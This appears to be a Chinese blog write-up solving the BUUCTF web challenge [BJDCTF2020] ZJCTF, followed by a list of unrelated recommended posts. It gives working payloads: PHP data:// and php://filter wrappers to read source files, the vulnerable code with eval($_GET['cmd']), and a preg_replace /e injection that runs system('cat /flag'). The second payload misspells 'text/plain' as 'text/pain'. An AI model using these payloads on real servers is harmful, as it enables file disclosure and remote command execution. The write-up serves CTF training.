BUUCTF---web---[BJDCTF2020]ZJCTF,不过如此

1、点开连接,页面出现了提示

传入一个参数text,里面的内容要包括I have a dream。

构造:?/text=I have a dream。发现页面没有显示。这里推测可能得使用伪协议

在文件包含那一行,我们看到了next.php的提示,我们尝试读取文件

根据代码:我们构造payload

/?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

2、页面出现base64编码

3、解码之后得到一串代码

复制代码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

4、分析代码:

定义了一个名为 complex的函数,用于对字符串进行正则替换操作。具体来说,它会将匹配到的字符串转换为小写。

/ei:当作php代码来执行,忽略大小写

定义了一个getFlag函数,将参数cmd中的参数输出

5、由此我们可以构造新payload

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat /flag');

使用正则表达式匹配一个或多个非空白字符(\S*),然后将其赋值给一个变量。

相关推荐
梓仁沐白3 分钟前
CSAPP-Attacklab
前端
郑州光合科技余经理19 分钟前
海外国际版同城服务系统开发:PHP技术栈
java·大数据·开发语言·前端·人工智能·架构·php
Evan芙21 分钟前
mysql二进制部署以及多实例部署
android·数据库·mysql
一行注释32 分钟前
前端数据加密:保护用户数据的第一道防线
前端
纪伊路上盛名在37 分钟前
记1次BioPython Entrez模块Elink的debug
前端·数据库·python·debug·工具开发
xiaoxue..39 分钟前
React 之 Hooks
前端·javascript·react.js·面试·前端框架
旧梦吟44 分钟前
脚本网页 三人四字棋
前端·数据库·算法·css3·html5
莫物1 小时前
element el-table表格 添加唯一标识
前端·javascript·vue.js
我看刑1 小时前
【已解决】el-table 前端分页多选、跨页全选等
前端·vue·element
我会一直在的1 小时前
Fiddler基础使用介绍
前端·测试工具·fiddler